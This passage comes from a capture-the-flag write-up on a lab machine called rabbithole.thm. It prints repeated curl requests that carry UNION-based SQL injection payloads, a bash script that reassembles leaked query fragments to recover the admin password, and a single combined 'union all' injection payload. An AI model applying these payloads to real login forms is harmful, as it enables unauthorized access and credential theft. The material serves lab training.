\ -b $'PHPSESSID=12' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 177, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=13' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 193, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' curl -i -s -k -X $'POST' \ -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=14' \ --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 209, 16) -- -&password=asdf&login=Submit+Query' \ $'http://rabbithole.thm/login.php' ``` {% endcode %} The script may take a while to complete.

After the users are all logged in, we can query the index page for each user and see the 16 character blocks for each user. Here we can see the queries that get triggered while loading the index page. {% code overflow="wrap" %} ```bash curl -s http://rabbithole.thm -H 'Cookie: PHPSESSID=1' | grep -o '.*' | tail -1 | sed -e 's/<[^>]*>//g' ``` {% endcode %}

To automate this, we can use the following script to request for each user and concatenate the results. {% code title="retrieve.sh" overflow="wrap" lineNumbers="true" %} ```bash #!/bin/bash # Initialize an empty variable to store concatenated output result="" # Loop through each session ID from 1 to 14 for i in {1..14}; do # Get the relevant data and strip HTML tags output=$(curl -s http://rabbithole.thm -H "Cookie: PHPSESSID=$i" | grep -o '.*' | tail -1 | sed -e 's/<[^>]*>//g') result+="$output" done # Print the final concatenated result echo "$result" ``` {% endcode %} We run the script several times until we finally timed the log in of the admin. This reveals the used password.

With that password, we are able to log in as `admin` via SSH and find the flag in the home directory of the user.

## One SQL Statement To Rule Them All Shamollash was so kind to share his SQL statement to leak the dessired information in one run. With that statement each 16 character block gets stored in a row using a union all query. The queries containing `info` we create with this payload are being filtered. With that we just need to create a user with that username and reload the page until the desired information leaks. ```sql 0" union all select null,mid(info,1,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,17,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,33,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,49,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,65,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,81,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,97,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,113,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,129,16) from information_schema.processlist where info not like '%info%' union all select null,mid(info,145,16) from information_schema.processlist where info not like '%info%' -- - ```

## Recommendation Don't miss out on Jaxafed's approach, which involves manipulating the database to write information into the ID of the users table: {% embed url="" %}